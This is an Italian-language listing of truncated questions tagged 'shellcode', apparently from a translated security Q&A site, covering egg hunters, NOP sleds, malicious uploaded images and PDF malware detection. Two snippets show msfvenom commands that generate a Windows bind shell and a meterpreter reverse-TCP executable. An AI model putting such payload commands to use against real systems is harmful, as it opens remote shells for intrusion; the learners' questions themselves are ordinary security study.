Domande con tag 'shellcode'

2
risposte

Come vengono posizionate le uova in memoria

Come viene messo un uovo in memoria prima dell'esecuzione del codice del cacciatore di uova? Se un carico utile è troppo grande per il buffer di exploit ma un cacciatore di uova può trovare il carico utile, il carico utile viene anche inviato...
posta 16.04.2018 - 18:47
1
risposta

Segfaulting del codice shell

Attualmente sto leggendo il libro Handbook of Wiley di Shellcoder, e sto avendo un grave problema nell'implementare uno dei shellcode di generazione di shell dal capitolo 3. Il codice è il seguente: Section .text global _start _start: jmp...
posta 28.11.2016 - 10:31
2
risposte

Sicuro di usare setuid senza alcun input?

Ho uno script di shell che sincronizza alcuni file da una fonte remota e ho un tipico setup del server HTTP. C'è un utente che possiede i file serviti dal server HTTP e un utente che esegue il server HTTP - entrambi appartengono allo stesso grup...
posta 07.12.2014 - 00:34
1
risposta

Come funziona la slitta NOP con MSFVenom? [chiuso]

Sto generando payload con MSFVenom ed ecco un esempio di output: user@localhost:~ $ msfvenom -p windows/shell_bind_tcp -b '\x00\x0a\x0d\x20' -i 3 -n 200 -f python No platform was selected, choosing Msf::Module::Platform::Windows from the paylo...
posta 17.03.2015 - 22:15
1
risposta

Come trovare immagini dannose nel server?

Recentemente il mio sito Drupal su un server Linux è stato preso di mira da attacchi di dirottamento di sessione. Immagino che gli attacchi siano stati originati da immagini contenenti codice dannoso che sono stati caricati nella web root perché...
posta 21.01.2014 - 03:25
1
risposta

Qual è l'uso di diversi tipi di shellcode? [chiuso]

Stavo navigando nella pagina shellcode nel sito Web exploit-db. Qual è l'uso di tutti questi diversi programmi di shellcode e perché dovremmo scriverli?     
posta 12.07.2018 - 00:31
2
risposte

MSFvenom payload con opzioni dinamiche

Utilizzo MSFvenom per esportare il payload TCP inverso di meterpreter. Sebbene funzioni con msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe , tuttavia vorrei specifi...
posta 17.11.2017 - 06:55
2
risposte

PDF parser e OPcodeExtraction [chiuso]

Sto realizzando un progetto universitario sul rilevamento di malware. In particolare ho bisogno di: - extract javascript from a PDF, - put it in the right order,...
posta 29.06.2017 - 12:26
1
risposta

Scoprire i codici di crittografia [chiuso]

Qual è il livello di complessità nel trovare un codice di crittografia quando sono disponibili il documento di origine e quello crittografato? In termini pratici: il malware nel computer invia un documento al TPM e ottiene una versione crittogra...
posta 28.05.2017 - 03:46
1
risposta

Variabili di shellcode indipendenti da posizione a 32 bit

In shellcode indipendente dalla posizione per finestre a 32 bit quali sono le tecniche più comunemente utilizzate per la memorizzazione di variabili stringa. Ho utilizzato le stringhe basate su stack: Regola il registro ESP Memorizza il va...
posta 08.04.2017 - 17:47